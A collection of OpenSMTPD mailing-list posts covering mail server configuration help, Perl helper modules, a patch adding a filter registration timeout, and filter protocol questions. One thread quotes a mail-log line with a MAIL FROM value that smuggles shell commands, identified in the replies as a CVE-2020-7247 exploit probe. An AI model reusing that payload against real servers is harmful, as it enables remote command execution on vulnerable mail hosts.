Re: mails not sent when using alias as recipient

2021-01-17 Thread Edgar Pettijohn
On Sun, Jan 17, 2021 at 06:33:29PM +0100, Yvan Masson wrote:
> Hi list,
> 
> I have two Debian servers that need to be able to send notification emails
> via a relay. Their configuration is identical, but only the first works
> properly. On the second, sending to aliases does not work:
> 
> 
> $ echo foo | mail -s test y...@masson-informatique.fr
> -> works
> 
> $ echo foo | mail -s test root
> mail: cannot send message: Process exited with a non-zero status
> -> does not work :-(
> 
> 
> Unfortunately after two hours digging I still can't find where the issue
> lies??? Any pointer would be greatly appreciated!
> 
> Best regards,
> Yvan
> 
> 
> # smtpd -d -T lookup
> 82908be87cc7fef7 smtp event=connected address=local host=debian
> lookup: check "local" as NETADDR in table static: -> found
> lookup: check "server.foo.fr" as DOMAIN in table static: -> 0
> lookup: check "local" as NETADDR in table static: -> found
> lookup: check "server.foo.fr" as DOMAIN in table static: -> 0
> 82908be87cc7fef7 smtp event=failed-command address=local host=debian
> command="RCPT TO: " result="550 Invalid recipient"
> 
> 82908be87cc7fef7 smtp event=closed address=local host=debian
> reason=disconnect
> 
> 
> $ cat /etc/smtpd.conf
> listen on localhost
> # If you edit the file, you have to run "smtpctl update table aliases"
> table aliases file:/etc/aliases
> table secrets file:/etc/smtpd.secrets
> accept for local \
> alias  \
> deliver to mbox
> accept for domain masson-informatique.fr \
> relay via secure+auth://y...@mail.infomaniak.com:587 \
> auth  \
> as y...@masson-informatique.fr
> 
> 
> $ cat /etc/aliases
> root: y...@masson-informatique.fr

r...@server.foo.fr: y...@masson-informatique.fr

> 
> 
> $ cat /etc/hostname
> 127.0.0.1   localhost
> 127.0.1.1   server.foo.fr serveur
> ::1 localhost ip6-localhost ip6-loopback
> ff02::1 ip6-allnodes
> ff02::2 ip6-allrouters
> 






Re: warn: table-proc: pipe closed (Probably mySQL-hassle and a newbie-question)

2020-08-15 Thread Edgar Pettijohn
On Sun, Aug 16, 2020 at 02:15:52AM +0200, Fabian M??ller wrote:
> 
> is your user allowed to connect to the host above?
> 
> ** Which host do you mean? mx01 is allowed to connect to db (ha-proxy) and 
> even db1, db2, db3 directly (which I also tried, but did not change 
> anything). And the internet is allowed to connect to mx1. Or did you mean the 
> mda1? mda1 is not yet set up.
>

The user from mysql.conf needs to be able to connect to the mysql server
found at host db.[removed for privacy].

>  
> 
> > username [removed for privacy]
> 
> > password [removed for privacy]
> 
> > database [removed for privacy]
> 
> > 
> 
> > query_credentials SELECT email, password FROM virtual_users WHERE email=?;
> 
> > query_domain SELECT name FROM virtual_domains WHERE name=?;
> 
> > query_userinfo SELECT uid,gid,maildir FROM virtual_users WHERE email=?;
> 
> > query_alias SELECT destination FROM virtual_aliases WHERE source=?;
> 
>  
> 
> # Further explinations: What I've tried
> 
> First I guess the error has something to do with the mysql-stuff.
> 
>  
> 
> But I am really really confused about the whole mysql-tables thing and can't 
> find a place where actually somebody explained (or documented) how it works.
> 
>  
> 
> Have you tried:
> 
>  
> 
> man table-mysql
> 
>  
> 
> Perhaps its missing if so you can find it on github.
> 
>  
> 
>  
> 
> ** I found the source for a man that sheds light on what those config options 
> are for. 
> 
>  
> 
> But that actually doesn???t help me with the error which occurs or if they 
> are needed.
> 
>  
> 
> By taking a look at table_proc.c from the opensmdpd source on github I guess 
> 
>  
> 
> > warn: table-proc: pipe closed
> 
>  
> 
> means that opensmtpd got an emty response when trying to do something (?) 
> with a table. I am unsure what opensmtpd is trying to do with the table. 
> Strangely it isn???t even trying to connect to the db-server (tcpdump 
> unrevals that). 
> 
>  
>

table-proc is a seperate process if I'm not mistaken that needs to talk
to the table-mysql which is a seperate process. If the pipe is closed
they can't talk to eachother.

> So what we know: It has something to do with the mysql-tables. What I don???t 
> understand is, what opensmtpd is trying to do which leads to that error. To 
> my understanding opensmtpd should only try to connect to the database if it 
> needs to read from the tables, which ??? if just starting up ??? obviously is 
> not the case. 
> 
>

If you try something like:

# smtpd -dv

You should get some useful messages from table-mysql if its not
connecting or what have you.

Edgar



Re: warn: table-proc: pipe closed (Probably mySQL-hassle and a newbie-question)

2020-08-15 Thread Edgar Pettijohn
On Sun, Aug 16, 2020 at 12:13:41AM +0200, Fabian M??ller wrote:
> Hi!
> 
> I am hopefully a new opensmtpd user and before I???ll start off with my first 
> newbie question I???d be happy to briefly introduce myself: I???m Fabian from 
> Germany. Actually I am studying german law, but as ??? in opposite to legal 
> work ??? anyone who wants to can ???do??? IT-stuff I???ve also been in IT 
> since I left school. Together with some friends I own a small IT-company 
> which makes me here and there a few bucks but is actually there more for the 
> fun rather than the profit. During shool-time I???ve already run a mailserver 
> (postfix + dovecot, but that actually doesn???t mean I???ve known anything 
> about mail ;)) but after we started offering services to businesses we 
> somehow switched over to an all in one solution (plesk).
> 
> As those AiO-solutions sucks because they are a blackbox and debugging is a 
> nightmare we've decided to do hosting ourself again. And as I am the only one 
> of us who is motivated to dive into mail, it became my part. So after some 
> days googeling around and spending a serious amount of time on youtube 
> watching mail-server-congress-talks I decided to go with a setup including 
> opensmtpd rather than postfix. As the best way to start with something is to 
> start trying I span up a few cloud-servers and started trying. As expected I 
> ran into problems but ??? not expected ??? reading the man and googeling 
> around couldn't solve them.
> 
> So that's how I ended up here, hoping for your help!
> 
> # General Setup
> 1. OpenSMTPD (tables via mysql, delivering via lmtp)
> 2. Dovecot (not yet set up)
> 3. MariaDB Galera Cluster as Backend-Database
> 
> # The Problem
> I'm getting the following error and can't connect to port 25 from outside 
> world (telnet port 25).

Are you sure your ISP isn't blocking you? Can you connect to a non
standard port or the submission port from outside?

listen on egress port 5000

telnet yourhost.com 5000

> 
> > Aug 15 23:17:25 mx01 smtpd[32458]: info: OpenSMTPD 6.0.3-portable starting
> > Aug 15 23:17:25 mx01 smtpd[32462]: warn: table-proc: pipe closed
> > Aug 15 23:17:25 mx01 smtpd[32462]: lookup: table-proc: exiting
> > Aug 15 23:17:25 mx01 smtpd[32459]: smtpd: process lka socket closed 
> 

Is mysqld up and running? Have you verified from the command line that
your username and password are correct?

mysql --user=username --password=password dbase

> # Host-System
> OS: Debian 10
> OpenSMTPd: 6.0.3p1-5+deb10u4
> Openssmtpd-extras: 5.7.1-4+b2
> 
> # /etc/smtpd.conf
> > # Variablen setzen
> > ipv4addr = [removed for privacy]
> > hostn = mx01.[removed for privacy]
> >
> > # komprimiert die Warteschlange, verschl??sselt sie und l??scht nach 4 
> > Stunden (optional)
> > #queue compression
> > #queue encryption key "[removed for privacy]"
> > #expire 4h
> >
> > # Zertifikate hinzuf??gen
> > pki mx01.[removed for privacy] certificate "/etc/ssl/mx01.[removed for 
> > privacy].crt"
> > pki mx01.[removed for privacy] key "/etc/ssl/private/mx01.[removed for 
> > privacy].key"
> > 
> > # Relevante Tabellen laden
> > table domains mysql:/etc/mail/mysql.conf
> > table credentials mysql:/etc/mail/mysql.conf
> > 
> > # Zuh??ren
> > listen on $ipv4addr port smtp tls
> > listen on $ipv4addr smtps pki mx01.mx.itsmind.dev auth 
> > listen on $ipv4addr port submission tls-require pki mx01.mx.itsmind.dev 
> > auth 
> > 
> > # E-Mails annehmen und weitergeben
> > accept from any for domain  deliver to lmtp "mda1:24"
> > accept for any relay
> 
> # /etc/mail/mysql.conf
> > host db.[removed for privacy]

is your user allowed to connect to the host above?

> > username [removed for privacy]
> > password [removed for privacy]
> > database [removed for privacy]
> > 
> > query_credentials SELECT email, password FROM virtual_users WHERE email=?;
> > query_domain SELECT name FROM virtual_domains WHERE name=?;
> > query_userinfo SELECT uid,gid,maildir FROM virtual_users WHERE email=?;
> > query_alias SELECT destination FROM virtual_aliases WHERE source=?;
> 
> # Further explinations: What I've tried
> First I guess the error has something to do with the mysql-stuff.
> 
> But I am really really confused about the whole mysql-tables thing and can't 
> find a place where actually somebody explained (or documented) how it works.

Have you tried:

man table-mysql

Perhaps its missing if so you can find it on github.

> 
> In the beginning I thought it works like if I write 
> 
> > table domains mysql:/etc/mail/mysql.conf
> 
> to the smtpd.conf the value domains is retrieved from what's stated after
> 
> query_domains  (query_domains because the name of the table is domains. So 
> from my guess table example would translate to query_example).
> 
> Therefor I only had one line 
> 
> query_domain SELECT name FROM virtual_domains WHERE name=?;
> 
> in my mysql.conf. I've also tried using $1 instead of ?. After every conf I 
> found in the internet (about 3) had 

Re: Is LDAP+SSL supported?

2020-07-25 Thread Edgar Pettijohn
On Sat, Jul 25, 2020 at 02:26:27PM +0200, ?loi Rivard wrote:
> > In my opinion, table-ldap from extras is doomed as it relies on a lib
> > that
> > is barely maintained and doing LDAP asynchronously is painful. 
> 
> Are you saying the support for table-ldap may stop in a near future?
> 
> > I doubt the
> > code will go much further than it currently does.
> However, would you still accept patches for ldaps support?
> 
> > If the table-procexec work I documented on my blog gets pushed to
> > OpenBSD,
> > then it will ease the writing of a table-ldap with a modern library.
> I will keep an eye on this then.

I think the plan is to move to the table-procexec. Similar to the
filters and you would be able to write an ldap backend in any language.

Edgar



Re: Help to adapt ???Setting up a mail server with OpenSMTPD, Dovecot and Rspamd???

2020-07-19 Thread Edgar Pettijohn
table-passwd can be found here:

https://github.com/OpenSMTPD/OpenSMTPD-extrashttps://github.com/OpenSMTPD/OpenSMTPD-extras

On Mon, Jul 13, 2020 at 05:23:20PM -0300, Leandro Peracchi wrote:
> Scenario: hypno.cat expanded inside a Raspberry Pi 4 with Arch Linux, three
> breeds (domains), two virtual users and one local user.
> 
> 
> - Raspberry Pi 4 Model B Rev 1.2 with 4 GB RAM and 64 GB SD Card
> 
> - Arch Linux ARM armv7l with kernel 5.4.50-1-ARCH
> 
> - OpenSMTPD 6.7.1p1-4, Dovecot 2.3.10.1-1 and Rspamd 2.5-2
> 
> - three domains [ birman.com persian.com siamese.com ]
> 
> - same two virtual users on each domain [ daddy mommy ]
> 
> - one ip address [ a.b.c.d ]
> 
> - one local user [ user ]
> 
> 
> DNS records:
> 
> 
> birman.com A a.b.c.d
> 
> birman.com MX 10 mail.birman.com
> 
> birman.com TXT "v=spf1 mx -all"
> 
> _dmarc birman.com TXT "v=DMARC1;p=none;pct=100;rua=mailto:postmaster@
> birman.com;"
> 
> 20200713._domainkey birman.com TXT "v=DKIM1;k=rsa;p=MIG...QAB;"
> 
> mail birman.com A a.b.c.d
> 
> 
> * same for persian.com and siamese.com with respective changes in domain
> name
> 
> 
> Created a local user to manage the six virtual mailboxes.
> 
> 
> $ sudo useradd -m -c "Virtual Mail" -d /var/mail/vmail -s /sbin/nologin
> vmail
> 
> 
> I got the certificates with LetsEncrypt.
> 
> 
> $ sudo certbot --nginx --agree-tos --no-eff-email --redirect --hsts
> --staple-ocsp --email personal.em...@gmail.com -d mail.birman.com
> 
> 
> Generate keys for DKIM.
> 
> 
> $ sudo mkdir /etc/smtpd/dkim
> 
> $ sudo openssl genrsa -out /etc/smtpd/dkim/birman.com.key 1024
> 
> $ sudo openssl rsa -in /etc/smtpd/dkim/birman.com.key -pubout \
> 
> -out /etc/smtpd/dkim/birman.com.pub
> 
> $ sudo chown -R rspamd:rspamd /etc/smtpd/dkim
> 
> 
> * same for persian.com and siamese.com with respective changes in domain
> name
> 
> 
> In this learning setup will exist six virtual mailboxes and three email
> addresses delivering to the local user ???user??? (u...@birman.com,
> u...@persian.com and u...@siamese.com).
> 
> 
> Under /home/user/Maildir will be mail sent for u...@birman.com,
> u...@persian.com and u...@siamese.com.
> 
> 
> At /var/mail/vmail will exist three directories (birman.com, persian.com
> and siamese.com) and below each of these directories will exist two
> directories (daddy and mommy) which in turn will have the Maildir directory
> to store mail.
> 
> 
> Also I would like OpenSMTPD to use the respective domain/certificate when
> receiving or sending mail (based on the domain of the user receiving or
> sending).
> 
> 
> I can get all ???parts??? ready to work but cannot create the appropriate 
> files
> to OpenSMTPD and Dovecot make this scenario work.
> 
> 
> If this scenario is possible and someone with more knowledge could provide
> the configuration for smtpd.conf and dovecot.conf I would be grateful.
> 
> 
> It has been two weeks trying to understand/consolidate several pieces of
> information from the Internet without success. Also I find other problems
> on the way. First I tried with Manjaro ARM (64-bit). Could not get rspamd
> to start. Then I tried Ubuntu 20.04. Some packages aren???t available. Tried
> to put OpenBSD or FreeBSD on Raspberry, can???t either. Get all ???parts??? 
> ready
> on Arch Linux. I???m learning a lot, but some help now would be great!
> 
> 
> Thanks!



Re: Help to adapt ???Setting up a mail server with OpenSMTPD, Dovecot and Rspamd???

2020-07-14 Thread Edgar Pettijohn
On Tue, Jul 14, 2020 at 10:10:23PM -0300, Leandro Peracchi wrote:
> I made some progress, all services start without errors.
> 
> When tried to send a test mail from Gmail to my server, got the error:
> 
> smtpd[727]: ny express[727]: c2a5ef6f793addab mda delivery
> evpid=567ebdf9f826cf44
>   from= to= rcpt=
> user=vmail
>   delay=4m10s result=TempFail stat=Error
>   (temporary failure: "mail.lmtp: LMTP server error: 550 5.1.1 <
> mo...@birman.com> User doesn't exist: mo...@birman.com")
> 
> Below are my conf files
> 
> 
> /etc/smtpd/smtpd.conf
> =
> pki mail.birman.com cert "/etc/letsencrypt/live/
> mail.birman.com/fullchain.pem"
> pki mail.birman.com key  "/etc/letsencrypt/live/mail.birman.com/privkey.pem"
> 
> #pki mail.persian.com cert "/etc/letsencrypt/live/
> mail.persian.com/fullchain.pem"
> #pki mail.persian.com key  "/etc/letsencrypt/live/
> mail.persian.com/privkey.pem"
> 
> srs key "j1wFzMlJEb1w81mqWC1NpKRsMJBzeKavii+ALQ8W"
> #srs key backup ""
> 
> filter check_dyndns phase connect match rdns regex { '.*\.dyn\..*',
> '.*\.dsl\..*' } \
>   disconnect "550 no residential connections"
> 
> filter check_rdns phase connect match !rdns \
>   disconnect "550 no rDNS is so 80s"
> 
> filter check_fcrdns phase connect match !fcrdns \
>   disconnect "550 no FCrDNS is so 80s"
> 
> filter senderscore \
>   proc-exec "filter-senderscore -blockBelow 10 -junkBelow 70 -slowFactor
> 5000"
> 
> filter rspamd proc-exec "filter-rspamd"
> 
> table aliases  file:/etc/smtpd/aliases
> table domains  file:/etc/smtpd/domains
> table passwds  file:/etc/smtpd/passwds

See note below about passwd-file.

> table virtuals file:/etc/smtpd/virtuals
> 
> listen on 0.0.0.0 tls pki mail.birman.com \
>   filter { check_dyndns, check_rdns, check_fcrdns, senderscore, rspamd }
> 
> listen on 0.0.0.0 port submission mask-src tls-require pki mail.birman.com
> auth  \
>   filter rspamd
> 
> action "RECV" lmtp "/var/run/dovecot/lmtp" rcpt-to virtual 
> match from any for domain  action "RECV"
> 
> action "SEND" relay srs helo mail.birman.com
> match from any auth for any action "SEND"
> 
> 
> /etc/smtpd/aliases
> ==
> vmail:  /dev/null
> 
> root:   user
> user:   da...@birman.com
> 
> 
> /etc/smtpd/domains
> ==
> birman.com
> persian.com
> siamese.com
> 
> 
> /etc/smtpd/mailname
> ===
> mail.birman.com
> 
> 

If you are trying to use passwd-file format you need to install the
passwd backend.

> /etc/smtpd/passwds
> ==
> da...@birman.com:$6$...::
> mo...@birman.com:$6$...::
> da...@persian.com:$6$...::
> mo...@persian.com:$6$...::
> da...@siamese.com:$6$...::
> mo...@siamese.com:$6$...::
> 
> 
> /etc/smtpd/virtuals
> ===
> da...@birman.comvmail
> mo...@birman.comvmail
> 
> da...@persian.com   vmail
> mo...@persian.com   vmail
> 
> da...@siamese.com   vmail
> mo...@siamese.com   vmail
> 
> 
> /etc/dovecot/dovecot.conf
> =
> listen = 0.0.0.0
> 
> ssl = required
> ssl_cert =  ssl_key  =  
> ssl_min_protocol = TLSv1.2
> ssl_prefer_server_ciphers = yes
> 
> disable_plaintext_auth = yes
> 
> protocols = lmtp imap
> 
> service lmtp {
> unix_listener lmtp {
> user  = vmail
> group = vmail
> }
> }
> 
> service imap-login {
> inet_listener imaps {
> port = 993
> }
> }
> 
> passdb {
> driver = passwd-file
> args = scheme=SHA512-CRYPT username_format=%n /etc/dovecot/users
> }
>

username_format=%u

Since your database has the full username. Or you can probably just omit
it.

> userdb {
> driver = passwd-file
> args = username_format=%n /etc/dovecot/users
> override_fields = uid=vmail gid=vmail home=/var/mail/vmail/%d/%n
> }
> 
> mail_location = maildir:~/Maildir
> 
> 
> /etc/dovecot/users
> ==
> da...@birman.com:{SHA512-CRYPT}$6$...
> mo...@birman.com:{SHA512-CRYPT}$6$...

Good luck,

Edgar



Re: mail log oddity

2020-06-11 Thread Edgar Pettijohn
On Thu, Jun 11, 2020 at 04:26:37PM -0700, Niklas wrote:
> I'm curious what this would actually accomplish on a vulnerable server.
> 
> There's no path or executable its trying to find in its iterations. This 
> looks more like an arbitrary shell command meant to act as a scan/test to 
> find vulnerable servers without fully leveraging the exploit.
> 
> If you had the IP it originates from it could tell you a lot.On Jun 10, 2020 
> 8:08 PM, Ryan Kavanagh  wrote:

61.148.74.134

Edgar

> >
> > On Wed, Jun 10, 2020 at 10:00:08PM -0500, Edgar Pettijohn wrote: 
> > > Saw this in the maillog today. Any ideas what they are trying to do? 
> > > 
> > >?? 249c054a86af9328 smtp failed-command command="MAIL FROM: <;for i in 0 1 
> > >2 3 4 5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>" result="530 5.5.1 
> > >Invalid command: Must issue an AUTH command first" 
> >
> > My guess is that they're trying to exploit CVE-2020-7247. Search the 
> > advisory text for that command: 
> >
> > https://www.qualys.com/2020/01/28/cve-2020-7247/lpe-rce-opensmtpd.txt 
> >
> > Best, 
> > Ryan 
> >



mail log oddity

2020-06-10 Thread Edgar Pettijohn
Saw this in the maillog today. Any ideas what they are trying to do?

 249c054a86af9328 smtp failed-command command="MAIL FROM: <;for i in 0 1 2 3 4 
5 6 7 8 9 a b c d;do read r;done;sh;exit 0;>" result="530 5.5.1 Invalid 
command: Must issue an AUTH command first"

Edgar



Re: Newbie config question

2020-06-05 Thread Edgar Pettijohn
On Fri, Jun 05, 2020 at 11:28:12AM -0500, David Favor wrote:
> I've been wrestling with this for days with no progress.
> 
> Can someone drop me a v6.6.4 config to do something similar to the following.
> 
>da...@davidfavor.com   - maildir
>i...@davidfavor.com- forward to da...@davidfavor.com
>supp...@davidfavor.com - forward to f...@helpdesk.com using MailGun Relay 
> Service
> 
>supp...@radicalhealth.com - maildir
>i...@radicalhealth.com- forward to supp...@radicalhealth.com
>da...@radicalhealth.com   - send natively to da...@davidfavor.com (no 
> Smarthost or Relay Service)
> 
> Just a raw config file will be fine, I can remove
> whatever I don't require right now, like DKIM signing,
> which I'll add later.
>

It would likely be easier if you just posted your current smtpd.conf and
associated tables. 

Edgar

> I'm just trying to get basic OpenSMTPD delivery working.
> 
> Thanks.



Re: new table backends

2020-05-26 Thread Edgar Pettijohn
On Tue, May 26, 2020 at 10:58:12PM +, gil...@poolp.org wrote:
> Hellow,
> 
> I have been working on a new table backend: table-procexec.
> 
> What it does is translate the imsg table API to a line-based protocol that is
> very similar to what we did for filters. A table backend can become a program
> consuming table requests from stdin and responding to stdout:
> 
> stdin : table
> 
> 
> The idea behind this is to unlock table backend development to people who are
> not necessarily C developers and who could still write useful implementations
> in other languages. Like with filters, this makes it possible to use anything
> from awk to shell, Go, Python and what not without OpenSMTPD caring about how
> these backends are implemented.
> 
> I have written a Golang package to abstract the protocol details and that let
> you write a backend by implementing the four basic operations of table API. A
> sample table-example.go is available here to see how a backend looks like:
> 
> https://gist.github.com/poolpOrg/b3b97a65791a11a49f5e76ea51331ae4
> 
> 
> If people are willing to help implement some backends, hit me up
> 
> Cheers,
> Gilles

Sweet. Looking at 
https://github.com/poolpOrg/go-opensmtpd/blob/master/table/table.go 
seems like it will be pretty simple to write some nice tables.

Thanks!



[patch] add a timeout to filter registration

2020-05-02 Thread Edgar Pettijohn
When playing with filters its easy to forget to register
stdout, etc...

Here is a patch to add a timeout and give a little helpful info as
opposed to just hanging in an unusable state.
Index: lka_filter.c
===
RCS file: /cvs/src/usr.sbin/smtpd/lka_filter.c,v
retrieving revision 1.62
diff -u -p -u -r1.62 lka_filter.c
--- lka_filter.c24 Apr 2020 11:34:07 -  1.62
+++ lka_filter.c2 May 2020 15:37:56 -
@@ -66,6 +66,7 @@ static void   filter_result_disconnect(uin
 static voidfilter_session_io(struct io *, int, void *);
 void   lka_filter_process_response(const char *, const char *);
 
+static voidlka_proc_timeout(int, short, void *);
 
 struct filter_session {
uint64_tid;
@@ -180,6 +181,7 @@ struct processor_instance {
char*name;
struct io   *io;
struct io   *errfd;
+   struct event tmo;
int  ready;
uint32_t subsystems;
 };
@@ -213,10 +215,13 @@ lka_proc_config(struct processor_instanc
io_printf(pi->io, "config
 }
 
+#define TIMEOUT 10
+
 void
 lka_proc_forked(const char *name, uint32_t subsystems, int fd)
 {
struct processor_instance   *processor;
+   struct timeval timeout = { TIMEOUT, 0 };
 
if (!processors_inited) {
dict_init();
@@ -232,6 +237,10 @@ lka_proc_forked(const char *name, uint32
 
io_set_fd(processor->io, fd);
io_set_callback(processor->io, processor_io, processor->name);
+
+   evtimer_set(>tmo, lka_proc_timeout, processor);
+   evtimer_add(>tmo, );
+
dict_xset(, name, processor);
 }
 
@@ -269,6 +278,7 @@ processor_register(const char *name, con
processor = dict_xget(, name);
 
if (strcmp(line, "register
+   evtimer_del(>tmo);
processor->ready = 1;
return;
}
@@ -1741,4 +1751,12 @@ lka_report_proc(const char *name, const 
sp = ep + 1;
 
lka_report_filter_report(reqid, name, 0, direction, , sp);
+}
+
+static void
+lka_proc_timeout(int fd, short events, void *arg)
+{
+   struct processor_instance *processor = arg;
+
+   fatalx("%s: failed to register", processor->name);
 }


Re: Custom filter

2020-04-16 Thread Edgar Pettijohn
On Thu, Apr 16, 2020 at 06:14:46PM +0200, Martijn van Duren wrote:
> On 4/16/20 3:58 PM, Jacky wrote:
> > Hi,
> > 
> > I am using Opensmtp 6.6.4p1. I am going to use Opensmtp as outgoing SMTP 
> > server, and use POP before SMTP method for authentication.
> > 
> > Is it possible for us to write and use custom filter ? If yes, is there any 
> > information / resources available in the web ?
> > 
> > Jacky
> > 
> 

You can get the manual here:
https://raw.githubusercontent.com/OpenSMTPD/OpenSMTPD/portable/smtpd/smtpd-filters.7

I don't believe it is 100% but still a good starting point.

Edgar

> There are a couple of filters available, but I'm not aware of how
> cross-platform available they are.
> From the OpenBSD ports tree there's the following written in go:
> - https://github.com/poolpOrg/filter-rspamd
> - https://github.com/poolpOrg/filter-senderscore
> - spamassassin via https://www.umaxx.net
> The latter has a couple of other filters, but aren't in the ports
> tree, so probably have a little less testing.
> 
> I have written filter-dnsbl and filter-dkimsign in C:
> - http://imperialat.at/dev/libopensmtpd/ (dependency for both)
> - http://imperialat.at/dev/filter-dnsbl/
> - http://imperialat.at/dev/filter-dkimsign/
> 
> I've got libopensmtpd to compile on Linux, but after that my need to get
> them to work on Linux disappeared so the filters themselves never got 
> there. If you want to use them I'm willing to help you set them up in 
> your environment and commit the changes to my repo.
> 
> Other filters are relatively easy to write, but I don't think the
> protocol is properly documented. You can look at this thread[0] as a
> starting point, but there have been some minor changes since then, so
> make sure to check your input.
> 
> martijn@
> 
> [0] https://www.mail-archive.com/misc@opensmtpd.org/msg03727.html



filter-spamassassin.pl

2020-04-01 Thread Edgar Pettijohn

http://www.pettijohn-web.com/filter-spamassassin.pl

http://www.pettijohn-web.com/SHA512

I've written a little spamassassin filter in perl. The only requirements 
you may not have installed is AnyEvent. Its pretty common so your os 
most likely has it packaged. If not:


# cpan -i AnyEvent

Obviously you will also need the spamassassin daemon running.

I've been using it for about 3 days so far without issues, though there 
may still be bugs lurking. One is likely to be the need for a message 
size limit. Not sure what that should be though.



Edgar




OpenSMTPD::Password perl module now supports openbsd

2020-03-19 Thread Edgar Pettijohn
OpenBSD is now supported and tested on OpenBSD 6.6 stable. Install both 
modules listed below and then just 'use OpenSMTPD::Password qw/newhash 
checkhash/;' It will automatically detect the XS module and use it.


http://www.pettijohn-web.com/OpenSMTPD-Password-XS-0.01.tar.gz

http://www.pettijohn-web.com/OpenSMTPD-Password-0.03.tar.gz

http://www.pettijohn-web.com/SHA512

On 3/18/20 10:29 AM, Edgar Pettijohn wrote:
Just updated the module with a few minor tweaks, mostly just making it 
more perl like and a few more error checks. Also requires 
BSD::arc4random to provide random numbers as opposed to the perl 
builtin rand(). Should make the truly paranoid types happy :) Again it 
still only works for portable. Plan on adding openbsd support this 
weekend hopefully. If not sometime soon.


http://www.pettijohn-web.com/OpenSMTPD-Password-0.02.tar.gz

http://www.pettijohn-web.com/SHA512

I'm also working on a plack app for adding/deleting users and allowing 
users to change their passwords. Its still pretty rough, but mostly 
works. Currently it only supports sql databases. Tested with mariadb, 
but I think its generic enough that mysql and postgres should work out 
of the box. If anyone is interested in checking it out let me know. It 
would really benefit from some html gurus attention.


Thanks,


Edgar






OpenSMTPD::Password perl module

2020-03-18 Thread Edgar Pettijohn
Just updated the module with a few minor tweaks, mostly just making it 
more perl like and a few more error checks. Also requires 
BSD::arc4random to provide random numbers as opposed to the perl builtin 
rand(). Should make the truly paranoid types happy :) Again it still 
only works for portable. Plan on adding openbsd support this weekend 
hopefully. If not sometime soon.


http://www.pettijohn-web.com/OpenSMTPD-Password-0.02.tar.gz

http://www.pettijohn-web.com/SHA512

I'm also working on a plack app for adding/deleting users and allowing 
users to change their passwords. Its still pretty rough, but mostly 
works. Currently it only supports sql databases. Tested with mariadb, 
but I think its generic enough that mysql and postgres should work out 
of the box. If anyone is interested in checking it out let me know. It 
would really benefit from some html gurus attention.


Thanks,


Edgar




perl module for hashing/checking passwords

2020-03-11 Thread Edgar Pettijohn
Here is a simple perl module for hashing passwords/checking passwords 
for use in scripts and such. Tested on Slackware current and Netbsd 8.1 
others expected to work. Only works with portable smtpd.


Basically just a perl version of contrib/libexec/encrypt/encrypt.c

http://www.pettijohn-web.com/OpenSMTPD-Password-0.01.tar.gz


Edgar




Re: filter question

2020-03-09 Thread Edgar Pettijohn

On Mar 9, 2020 1:34 AM, Martijn van Duren  wrote:
>
> On 3/6/20 5:00 PM, epektasis wrote:
> > Greetings.  I have my own blacklist file of email addresses
> > (some in the format microcen...@microcenter.com and some in 
> > the format *@squaredeals.com), one per line.  I would like to
> > filter each incoming email so that a mail-from address
> > that matches any line in the blacklist file will go to a
> > junk file.  In the smtpd.conf I have tried
> > 
> > table blksender file:/etc/blksender
> > filter mail-from  junk
> > match filter mail-from  junk
> > 
> > but get syntax errors on both of the last two lines when
> > checking the configuration.  There's something I'm not
> > understanding and am asking for advice.
> > epektasis
> > 
> Have another look at the manpage:
>  filter filter-name phase phase-name match conditions decision
>  Register a filter filter-name.  A decision about what to do
>  with the mail is taken at phase phase-name when matching
>  conditions.  Phases, matching conditions, and decisions are
>  described in MAIL FILTERING, below.
>
> So without testing (you should do that yourself anyway) I think what you
> want would be:
>
> table blksender file:/etc/blksender
> filter blksender phase mail-from match mail-from  junk
> listen on   filter blksender
>

Also look at table(5) '*' is only allowed on the domain side of the '@'.

Edgar

perl filter/report module

2020-02-25 Thread Edgar Pettijohn
I wrote a simple perl module for easing the writing of filter/reports 
for OpenSMTPD. It isn't 100% complete, but its usable.


http://www.pettijohn-web.com/OpenSMTPD-Report-0.01.tar.gz


Edgar





Re: Enforce outgoing mail to always use TLS

2020-02-22 Thread Edgar Pettijohn



On 02/22/20 12:55, Søren Aurehøj wrote:

Hi Misc

I am using OpenSMTPD 6.6.0 on OpenBSD 6.6 stable

Currently I’m using the tls-require option in order to get mandatory 
TLS on outgoing mail, but with that follows the normal time-out values 
regarding bounce intervals.
Because of greylisting, I’m not sure that adjusting these time-out 
values is the best way around this problem.


I have tested the scenario with a mailserver which is unable to use 
TLS, by sending mail to mailnesia.com .
This gives the expected result - "mta event=error reason=TLS required 
but not supported by remote host” in the maillog.


My mailserver recognizes when it is unable to continue the 
delivery due to a configuration setting on my mailserver.
But instead of bouncing the mail immediately, it is queued anyway for 
later delivery.



Is it possible to enforce outgoing mail to always use TLS - and bounce 
more or less immediately,
if the sending mailserver registers that the receiving mailserver is 
unable to meet our requirements regarding TLS?




Kind regards

Søren Aurehøj




I guess you could try adding to smtpd.conf:

bounce warn-interval 1s

Edgar


Re: Subject prefixing

2020-02-13 Thread Edgar Pettijohn

On Feb 13, 2020 2:01 PM, Ionel GARDAIS  wrote:
>
> Hi list,
>
> I'm looking for an easy way to add a static prefix "[*EXT*]" to all incoming emails, as long as the subject does not already contains this string.
> OpenSMTPD is running as a filtering MX running senderscore filter.
> default action is relay to another host.
>
> Can OpenSMTPD modify the header conditionally ?
A filter could be written to do this.
> If so, should I add a filter to the existing "listen" line or should I add a new "listen" line with a dedicated filter and chaining listen->action relay to local listen->action relay to external ?
If you used a separate listen directive. It would have to be on a different port.
>
> Thanks,
> Ionel
>
>



logging

2020-02-07 Thread Edgar Pettijohn
I'm curious with the advent of the `report/filter' interface. Will there 
be the possibility of disabling syslog logging in the future? I was 
thinking of writing a script to "log" in xml for easy parsing/pretty 
printing the logs. The only drawback I see is doubling the disk usage.


I suppose I could use tmux and do a `smtpd -d >/dev/null 2>&1' Just not 
sure if there would be any side effects.


Thanks,


Edgar




Re: filter bug?

2020-02-01 Thread Edgar Pettijohn




On 02/01/20 11:08, Reio Remma wrote:

Hello!

The token|session id in v0.4 of the filter protocol were swapped to 
the more sensible session id|token order in v0.5. I believe the docs 
are still being worked on and will apply to the v0.5 protocol.




Thought I was going crazy. I was reading docs for .5 and testing on a 
system running .4 so as usual the fault lies with myself.


Thanks!

Edgar

For example filter-rspamd was recently updated to work with both 
versions, switching the argument order as needed.


Good luck,
Reio

On 01.02.2020 4:18, Edgar Pettijohn wrote:
Not sure if its a documentation bug or not, but smtpd-filters.7 
states the following:


 For all phases, excepted "data-line", the responses must follow the 
same
 construct, a message type "filter-result", followed by the 
unique session

 id, the opaque token, a decision and optional decision-specific
 parameters:

filter-result|7641df9771b4ed00|1ef1c203cc576e5d|proceed
